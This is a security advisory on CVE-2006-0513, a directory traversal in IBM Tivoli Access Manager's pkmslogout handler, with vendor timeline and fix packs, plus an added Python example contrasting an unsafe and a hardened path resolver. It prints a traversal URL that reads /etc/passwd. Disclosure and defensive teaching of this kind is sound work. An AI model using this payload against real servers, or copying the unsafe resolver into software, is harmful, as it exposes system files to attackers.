  Application: IBM Tivoli Access Manager
  Version: 5.1.0.10, 6.0.0  (other versions untested)
 Severity: High
   Author: Timothy D. Morgan [EMAIL PROTECTED]
Vendor Status: Vendor Notified, Fix Available
CVE Candidate: CVE-2006-0513
Reference:
http://www.vsecurity.com/bulletins/advisories/2006/tam-file-retrieval.txt
- -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-



Product Description:

 From IBM's Website[1][2]:

 IBM Tivoli Access Manager for e-business is an award winning,
  policy-based access control solution for e-business and enterprise
  applications that is in the leader quadrant of Gartner's Magic
  Quadrant. Tivoli Access Manager for e-business can help you manage
  growth and complexity, control escalating management costs and address
  the difficulties of implementing security policies across a wide range
  of Web and application resources.

 Tivoli Access Manager Plug-in for Web Servers enforces a high degree
  of security in a secure domain by requiring each client to provide
  proof of identity. Comprehensive network security can be provided by
  having Tivoli Access Manager Plug-in for Web Servers control the
  authentication and authorization of clients.



Vulnerability Overview:

On December 1st, while conducting a penetration test of a TAM-enabled web
application, VSR identified a vulnerability in the Tivoli Web Server
Plug-in, a component of Tivoli Access Manager (TAM).  This flaw allows an
authenticated attacker to retrieve files that reside outside of the web
root from the web server on which the plug-in is installed.  Any file, or
any directory listing, that is readable by the web server software can be
retrieved.


Vulnerability Details:

IBM's TAM Plug-in contains a logout handler under the root web path named
`pkmslogout'.  This handler is designed to log out authenticated users.
The handler's display template can be specified by the `filename' request
parameter.  The value of this parameter is intended to be the partial path
to a file on the web server which contains the page template.  This file
path is vulnerable to directory traversal, and can be used to retrieve
nearly arbitrary files from the web server hosting the TAM Plug-in.

For instance, if a vulnerable plug-in existed on the system
tam.example.com, one could exploit the problem by requesting a URL such
as:
 http://tam.example.com/pkmslogout?filename=../../../../../../../etc/passwd

It appears this problem can only be triggered when the attacker is
already authenticated through the Web Plug-in.
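The following Python code is an added example and is not IBM's plug-in
code.  It places the flawed pattern (append a caller-supplied partial path
to a template root with no containment check) beside a hardened resolver,
and exercises both with the advisory's own traversal payload.  The
template root /var/www/templates, the function names and the handling of
percent-encoded input are assumptions made for the example, not details
taken from the plug-in.

```python
import posixpath
from typing import Optional
from urllib.parse import unquote

# Assumed template directory for the example; not the plug-in's real layout.
TEMPLATE_ROOT = "/var/www/templates"


def resolve_template_unsafe(filename: str, root: str = TEMPLATE_ROOT) -> str:
    """The flawed pattern: append the caller-supplied partial path to the root
    with no containment check, so '..' components walk out of the root."""
    return posixpath.normpath(posixpath.join(root, filename))


def resolve_template_safe(filename: str,
                          root: str = TEMPLATE_ROOT) -> Optional[str]:
    """Return the resolved path only if it stays inside root, else None.

    Percent-decoding happens first so '%2e%2e/' is judged as '../'; absolute
    paths, NUL bytes and backslashes are rejected outright; containment is
    then checked on the normalised path, not on the raw string.
    """
    decoded = unquote(filename)
    if not decoded or "\x00" in decoded or "\\" in decoded:
        return None
    if posixpath.isabs(decoded):
        return None
    root = posixpath.normpath(root)
    candidate = posixpath.normpath(posixpath.join(root, decoded))
    # commonpath, not a string prefix test: 'startswith(root)' would accept
    # /var/www/templates_evil/x for root /var/www/templates.
    if posixpath.commonpath([root, candidate]) != root:
        return None
    if candidate == root:
        return None  # the root itself is a directory, not a template
    # On a real filesystem also run os.path.realpath() on the candidate before
    # the commonpath check so a symlink inside root cannot point back outside.
    return candidate


if __name__ == "__main__":
    payload = "../../../../../../../etc/passwd"  # the advisory's example
    print("unsafe:", resolve_template_unsafe(payload))
    print("safe:  ", resolve_template_safe(payload))
    print("safe:  ", resolve_template_safe("logout.html"))
```

The unsafe resolver turns the advisory's payload into /etc/passwd; the
hardened one returns None for it, for the percent-encoded variant and for
an absolute path, while still resolving an ordinary template name under the
root.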



Vendor Response:
IBM was first notified on 2005-12-05.  Initial response was received on
2005-12-06.  A patch for this issue (for version 5.1.0) was released on
2006-01-18 as a limited-availability fix:
 5.1.0-TIV-WPI-LA0016.

A generally available fix pack for version 5.1.0 and 6.0 was released by
the vendor on 2006-02-03 and available as:

Fixpack 5.1.0-TIV-WPI-FP0017 is available at:
 http://www-1.ibm.com/support/docview.wss?uid=swg24011562

Fixpack 6.0.0-TIV-WPI-FP0001 is available at:
 http://www-1.ibm.com/support/docview.wss?uid=swg24011561


Recommendation:

Apply the relevant fix packs available from IBM.


- -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-


Common Vulnerabilities and Exposures (CVE) Information:

The Common Vulnerabilities and Exposures (CVE) project has assigned
the following name to this issue.  This is a candidate for inclusion
in the CVE list (http://cve.mitre.org), which standardizes names for
security problems.

  CVE-2006-0513

- -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-



References:

1.  IBM Tivoli Access Manager for e-business - Product overview
http://www-306.ibm.com/software/tivoli/products/access-mgr-e-bus/

2.  IBM Tivoli Access Manager Plug-in for Web Servers Authentication
http://publib.boulder.ibm.com/infocenter/tivihelp/v2r1/topic/com.ibm.itame2.doc_5.1/am51_webservers_guide26.htm



- -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-

Greetings to:
  Hotsauce, Beans, and Cornbread

- -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-

Copyright 2006 Virtual Security Research, LLC. All rights reserved.



-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.4.1 (Darwin)

iD8DBQFD4+rATY6Rj3GeBOoRAi+eAJ43hbN4SCozKwEVi7q9UVWjtSTe+gCglrwN
BjxuwG+YiPsBpIQfA0CYM6k=
=GGKM
-----END PGP SIGNATURE-----